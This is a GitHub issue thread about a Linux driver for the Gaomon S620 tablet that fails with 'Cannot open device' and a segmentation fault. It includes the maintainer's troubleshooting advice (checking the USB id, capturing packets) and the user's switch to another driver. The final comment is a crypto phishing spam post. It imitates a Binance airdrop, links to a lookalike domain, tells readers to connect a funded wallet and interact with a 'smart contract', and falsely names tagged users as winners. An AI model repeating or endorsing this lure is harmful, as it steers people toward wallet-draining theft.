### ISSUE TITLE
Cannot open device; Segmentation fault

### ISSUE THREAD

**Issue by RoyDubnium** [Pytness/gaomon-s620-driver#1]
After installing the dependencies and building the driver, running the driver just results in the process exiting with the message "Cannot open device", then "Segmentation fault". I'm using Linux mint, an Ubuntu based distro.

**Comment by Pytness** [comment]
This is probably because you have a tablet with a different product id.
You can list your usb devices with `lsusb`. The device id should be: `256c:006d`.

If your device id is different, the tablet will be most definitely using a different protocol, which will make the driver unusable. In that case, you will have to dump the usb packets, either with some tool like `wireshark` or hacking through the code (shouldn't take long) to inspect them, analyze them, and accordingly implement the protocol.

Unfortunately, my table got stolen two years ago and I haven't been able to continue the development of this repo, but I will try fixing some errors and assist you with any help you need.

Edit:

For wireshark, you have the folder [pcapng](https://github.com/Pytness/gaomon-s620-driver/tree/master/pcapng), which contains a bunch of captured packets of the s620 that can help you know what you should be looking for.

**Comment by Pytness** [comment]
Added some small changes on [#dev ](https://github.com/Pytness/gaomon-s620-driver/tree/dev)

**Comment by RoyDubnium** [comment]
Thank you for the reply. I did check the device ID beforehand, and it does  match the one you provided. I'm not sure what the issue is, but i ended up using OpenTabletDriver, which worked (until it didn't)

**Comment by mapatel90** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://claim.bnbchainnetwork.xyz/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @hmert, @ParatonerTr, @rarefin, @XXL6, @KumarUniverse, @reneordosgoitia, @nickspurry
